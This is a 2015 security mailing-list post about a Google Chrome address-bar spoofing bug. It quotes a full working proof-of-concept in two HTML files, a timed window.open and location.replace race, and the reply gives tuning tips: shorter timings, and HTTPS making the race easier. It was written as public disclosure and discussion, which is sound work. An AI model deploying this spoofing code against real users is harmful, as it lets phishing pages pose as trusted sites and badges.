Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 01 Jul 2015 14:39:14 +0100
From: David Leo <david.leo@...sen.co.uk>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org, 
 oss-security@...ts.openwall.com
Subject: Re: Google Chrome Address Spoofing (Request For Comment)

http://seclists.org/fulldisclosure/2015/Jun/109
Big Whale said:
"Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works"
"clearly URL spoofing"
Thanks for testing!

http://seclists.org/oss-sec/2015/q3/0
0pc0deFR said:
"Work on Google Chrome Ubuntu"
Bonjour, thanks for testing!

http://seclists.org/oss-sec/2015/q2/824
Daniel Micay said:
"It does display a window with the oracle.com address"
"why you've got an ever increasing number of setTimeout events"
http://seclists.org/oss-sec/2015/q2/823
Alexander E. Patrakov said:
"Looks like a fork bomb"
Thanks for testing!
The number of "setTimeout" does NOT need to be increasing forever.
OK, I admit - we are lazy(it works and we don't touch it anymore)
:-)

http://seclists.org/oss-sec/2015/q3/2
Roney Gomes said:
"it worked on the desktop version of Opera"
Wow! Thanks for letting us know.
Here is the screenshot of Opera
http://www.deusen.co.uk/items/gwhere.6128645971389012/OperaScreenshot.png
And Chrome
http://www.deusen.co.uk/items/gwhere.6128645971389012/ChromeScreenshot.png
(A number is displayed in Chrome's address bar,
not the same as Opera)

http://seclists.org/oss-sec/2015/q2/826
Daniel Micay said:
"it can't always be replicated"
"I've tried it a few times and"
"it fails about as often as it works"
http://seclists.org/oss-sec/2015/q3/4
Valentinas Bakaitis said:
"PoC did not work"
Hey! The trick here is timing:
Please modify those numbers in code - make them smaller.

http://seclists.org/oss-sec/2015/q3/5
Zak Siddiqui said:
"Is it reproducible with HTTPS?"
Yes, we just tried this URL
https://en.wikipedia.org/wiki/Main_Page
It works.
In fact, it works BETTER against HTTPS,
because HTTPS is slower, so timing is easier.

http://seclists.org/oss-sec/2015/q2/825
Florian Weimer said:
"they show the new URL while still displaying old content"
Exactly, that's the cause of this bug.

In the end, allow me to repeat:
No user interaction on the fake page.
But, anyone can do
"BBB Accredited Business"
"PayPal Partner"
etc.

Kind Regards,

PS
We love clever tricks.
We love this:
http://dieyu.org/

On 2015/6/30 7:08, David Leo wrote:
> Impact:
> The "click to verify" thing is completely broken...
> Anyone can be "BBB Accredited Business" etc.
> You can make whitehouse.gov display "We love Islamic State" :-)
>
> Note:
> No user interaction on the fake page.
>
> Code:
> ***** index.html
> <script>
> function next()
> {
>      w.location.replace('http://www.oracle.com/index.html?'+n);n++;
>      setTimeout("next();",15);
>      setTimeout("next();",25);
> }
> function f()
> {
>      w=window.open("content.html","_blank","width=500 height=500");
>      i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
> }
> </script>
> <a href="#" onclick="f()">Go</a><br>
> ***** content.html
> <b>This web page is NOT oracle.com</b>
> <script>location="http://www.oracle.com/index.html";</script>
> ***** It's online
> http://www.deusen.co.uk/items/gwhere.6128645971389012/
> (The page says "June/16/2015" - it works as we tested today)
>
> Request For Comment:
> We reported this to Google.
> They reproduced, and say
> It's DoS which doesn't matter.
> We think it's very strange,
> since the browser does not crash(not DoS),
> and the threat is obvious.
> What's your opinion?
>
> Kind Regards,
>
> PS
> We love clever tricks.
> We love this:
> http://dieyu.org/

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.